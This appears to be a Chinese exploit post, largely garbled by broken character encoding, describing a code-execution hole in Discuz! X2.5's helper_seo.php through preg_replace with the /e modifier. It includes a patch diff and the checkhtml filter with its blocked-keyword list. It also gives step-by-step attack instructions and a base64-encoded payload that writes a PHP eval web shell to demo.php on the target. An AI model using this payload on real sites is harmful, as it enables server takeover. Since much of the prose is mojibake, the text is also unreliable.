DZ2.5 0day©exp

©⣺ Discuz!X2.5Release20120407ִ 
©ļupload\source\class\helper\helper_seo.php
 ں̨ˣǰ̨ͨݽִ
 ͼϴ Ŀ
 
 
 


 
 

PS: Discuz!ǿԴƷͨԱȵֶҵǰ⣬ϣصվ
 '---------------------------------------------------------------------------------------------------
 
if(!defined(IN_DISCUZ)) {
 @@ -89,7 +89,7 @@
 }
 }
 if($searcharray && $replacearray) {
 - $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 + $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 $content = preg_replace($searcharray, $replacearray, $content, 1);
 $content = preg_replace(/(.*?)/ies, helper_seo::base64_transform(decode, , \\1, ), $content);
 }
 @@ -100,7 +100,7 @@///www.hake.cc
 
public static function base64_transform($type, $prefix, $string, $suffix) {
 if($type == encode) {
 - return $prefix.base64_encode(str_replace(\, , $string)).$suffix; // C -
 + return $prefix.base64_encode(str_replace(\\\", \", $string)).$suffix;
 } elseif($type == decode) {
 return $prefix.base64_decode($string).$suffix;
 }
 ɣ/source/class/helper/helper_seo.php 92иģ
 1
 $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 preg_replace ʹe˫ţԵԶִС
 Ҫָ̳֧ܣɶܿ68 $_G['cache']['relatedlink']greprelatedlinkһ·ȲҵҪ̨seoܣӪ- /admin.php?frames=yes&action=misc&operation=relatedlinkҪһӣ⹦ܲйԱҾô󲿷ֶῪֻǸ̨shelltipsˡ
 1
 2
 3
 4
 function_core.php 1925
 function parse_related_link($content, $extent) {
 return helper_seo::parse_related_link($content, $extent);
 }
 
 
/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies
 

PS Ӱ汾УDiscuz!X2.5Release20120407betarc ִ 
1.ע˻ 
2.½ûblog־ע־ 
3.ͼƬѡͼƬַ{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 
4.־̳Ŀ¼demo.phpһ䷢c
 


ô÷ʽ˵ô ֵط source/include/space/space_blog.php  checkhtml 
 ͬشṩҴţο ţҪDСվ վֻǷ D һD͹
 
function checkhtml($html) {
 
        if(!checkperm('allowhtml')) {
 


                preg_match_all("/\<([^\<]+)\>/is", $html, $ms);
 


                $searchs[] = '<';
 
                $replaces[] = '<';
 
                $searchs[] = '>';
 
                $replaces[] = '>';
 


                if($ms[1]) {
 
                        $allowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br|p|b|strong|i|u|em|span|ol|ul|li|blockquote|object|param|embed';
 
                        $ms[1] = array_unique($ms[1]);
 
                        foreach ($ms[1] as $value) {
 
                                $searchs[] = "<".$value.">";
 


                                $value = str_replace('&', '_uch_tmp_str_', $value);
 
                                $value = dhtmlspecialchars($value);
 
                                $value = str_replace('_uch_tmp_str_', '&', $value);
 


                                $value = str_replace(array('\\','/*'), array('.','/.'), $value);
 
                                $skipkeys = array('onabort','onactivate','onafterprint','onafterupdate','onbeforeactivate','onbeforecopy','onbeforecut','onbeforedeactivate',
 
                                                'onbeforeeditfocus','onbeforepaste','onbeforeprint','onbeforeunload','onbeforeupdate','onblur','onbounce','oncellchange','onchange',
 
                                                'onclick','oncontextmenu','oncontrolselect','oncopy','oncut','ondataavailable','ondatasetchanged','ondatasetcomplete','ondblclick',
 
                                                'ondeactivate','ondrag','ondragend','ondragenter','ondragleave','ondragover','ondragstart','ondrop','onerror','onerrorupdate',
 
                                                'onfilterchange','onfinish','onfocus','onfocusin','onfocusout','onhelp','onkeydown','onkeypress','onkeyup','onlayoutcomplete',
 
                                                'onload','onlosecapture','onmousedown','onmouseenter','onmouseleave','onmousemove','onmouseout','onmouseover','onmouseup','onmousewheel',
 
                                                'onmove','onmoveend','onmovestart','onpaste','onpropertychange','onreadystatechange','onreset','onresize','onresizeend','onresizestart',
 
                                                'onrowenter','onrowexit','onrowsdelete','onrowsinserted','onscroll','onselect','onselectionchange','onselectstart','onstart','onstop',
 
                                                'onsubmit','onunload','javascript','script','eval','behaviour','e-xpression','style','class');
 
                                $skipstr = implode('|', $skipkeys);
 
                                $value = preg_replace(array("/($skipstr)/i"), '.', $value);
 
                                if(!preg_match("/^[\/|\s]?($allowtags)(\s+|$)/is", $value)) {
 
                                        $value = '';
 
                                }
 
                                $replaces[] = empty($value)?'':"<".str_replace('"', '"', $value).">";
 
                        }
 
                }
 
                $html = str_replace($searchs, $replaces, $html);
 
        }
 


        return $html;
 
}
 


